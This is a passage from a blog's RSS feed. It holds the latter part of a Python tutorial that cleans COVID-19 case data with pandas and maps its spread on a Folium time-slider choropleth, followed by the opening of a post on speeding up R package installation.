&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;United Kingdom&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;Republic of Ireland&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Ireland&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;Vatican City&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Italy&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; countries&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;CNTRY_NAME&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;Byelarus&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Belarus&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; countries&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;CNTRY_NAME&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;Macedonia&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;North Macedonia&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We also need to make sure that the country column has the same name in both files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; countries&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rename(columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#39;CNTRY_NAME&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Some countries are included in the data despite having zero confirmed cases. So we remove these:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df[corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Confirmed &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then sort our data by country and reset the index:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sorted_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sort_values([&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;ObservationDate&amp;#39;&lt;/span&gt;])&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;reset_index(drop&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Some countries, such as China, are split into different provinces/states. Since we just want the total number of cases per country, we get the sum for each country at each date:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sum_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sorted_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;groupby([&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;ObservationDate&amp;#39;&lt;/span&gt;], as_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sum()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can join the data and the shapefile together:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sum_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;merge(countries, on&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We are going to plot the log of the number of confirmed cases for each country, as there are a couple of countries, such as China and Italy, with a lot more cases compared to other countries.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;log10(joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;Confirmed&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We also need to convert the ObservationDate to unix time in nanoseconds:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;to_datetime(joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;ObservationDate&amp;#39;&lt;/span&gt;])&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;astype(int) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;**&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;astype(int)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;astype(str)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now select the columns needed for the map and discard the others:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[[&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;geometry&amp;#39;&lt;/span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="time-to-map"&gt;Time to map&lt;/h2&gt;
&lt;p&gt;A choropleth is a type of map where regions are shaded or patterned proportionally to a data variable. We are going to make a choropleth with a timeslider, to show the spread of COVID-19 over time. The &lt;code&gt;TimeSliderChoropleth&lt;/code&gt; class needs at least two arguments: a GeoJSON file containing the features (in this case, the countries) and a style dictionary. The style dictionary should have the following form:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;styledict &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; : {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; : {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: , &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; : {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: , &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; : {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; : {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: , &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; : {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: , &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this case, the keys are feature (country) ids. So for each country, we have a dictionary where the timestamps are the keys and the values are the colour and opacity of the country at that time.&lt;/p&gt;
&lt;p&gt;We have to first initialise the map. Folium allows the use of different map tiles. If we do not specify a map, it defaults to OpenStreetMap. Here, we will use &lt;code&gt;'cartodbpositron'&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mymap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; folium&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Map(tiles&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;cartodbpositron&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mymap&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save(outfile&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;infinite_scroll.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="400" src="infinite_scroll.html"&gt;&lt;/iframe&gt;
&lt;p&gt;Now we have a map of the world. However, there are a couple of problems: the continents are continually repeated and the map can be panned endlessly from either side. In order to prevent this from happening, we set a minimum zoom and set &lt;code&gt;max_bounds=True&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mymap_fix_boundary &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; folium&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Map(min_zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, max_bounds&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;, tiles&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;cartodbpositron&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mymap_fix_boundary&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save(outfile&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;fix_boundary.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="400" src="fix_boundary.html"&gt;&lt;/iframe&gt;
&lt;p&gt;Much better. You might need to change the value of &lt;code&gt;min_zoom&lt;/code&gt; depending on your platform. Now we define a colour map in terms of the log of the number of confirmed cases:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;max_colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; max(joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;min_colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; min(joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cm&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linear&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;YlOrRd_09&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;scale(min_colour, max_colour)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;colour&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;map(cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next, we construct our style dictionary:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;country_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;country_idx &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; range(len(country_list))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;style_dict &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; country_idx:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; country &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; country_list[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; country]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; inner_dict &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; _, r &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; result&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; inner_dict[r[&lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: r[&lt;span style="color:#a5d6ff"&gt;&amp;#39;colour&amp;#39;&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.7&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; style_dict[str(i)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; inner_dict
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then we need to make a dataframe containing the features for each country:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[[&lt;span style="color:#a5d6ff"&gt;&amp;#39;geometry&amp;#39;&lt;/span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries_gdf &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; gpd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;GeoDataFrame(countries_df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries_gdf &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; countries_gdf&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;drop_duplicates()&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;reset_index()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we create our map and add a colourbar:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;folium.plugins&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; TimeSliderChoropleth
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;slider_map &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; folium&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Map(min_zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, max_bounds&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,tiles&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;cartodbpositron&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;_ &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; TimeSliderChoropleth(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;countries_gdf&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;to_json(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; styledict&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;style_dict,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;add_to(slider_map)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;_ &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cmap&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;add_to(slider_map)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cmap&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;caption &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Log of number of confirmed cases&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;slider_map&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save(outfile&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;TimeSliderChoropleth.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="500" src="TimeSliderChoropleth2.html"&gt;&lt;/iframe&gt;
&lt;p&gt;By the time this blog post is published, this data will more than likely be out of date. For up to date information on COVID-19 in your area, the &lt;a href="https://www.who.int/" rel="external"&gt;World Heath Orginisation&lt;/a&gt; and &lt;a href="http://hub.arcgis.com/" rel="external"&gt;hub.arcgis.com&lt;/a&gt; are a great place to start. The Washington Post also produced a &lt;a href="https://www.washingtonpost.com/graphics/2020/world/corona-simulator/" rel="external"&gt;great article&lt;/a&gt;, using data simulation to show how social distancing is important in tackling COVID-19.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Faster R package installation</title><link>https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/</link><pubDate>Mon, 23 Mar 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="faster-package-installation"&gt;Faster package installation&lt;/h2&gt;
&lt;p&gt;Every few weeks or so, a tweet pops up asking about how to speed up package installation in R&lt;/p&gt;
&lt;img class="image-center" src="twitter.jpg" style="width:450px; class:image-center"&gt;
&lt;p&gt;Depending on the luck of twitter, the author may get a few suggestions.&lt;/p&gt;
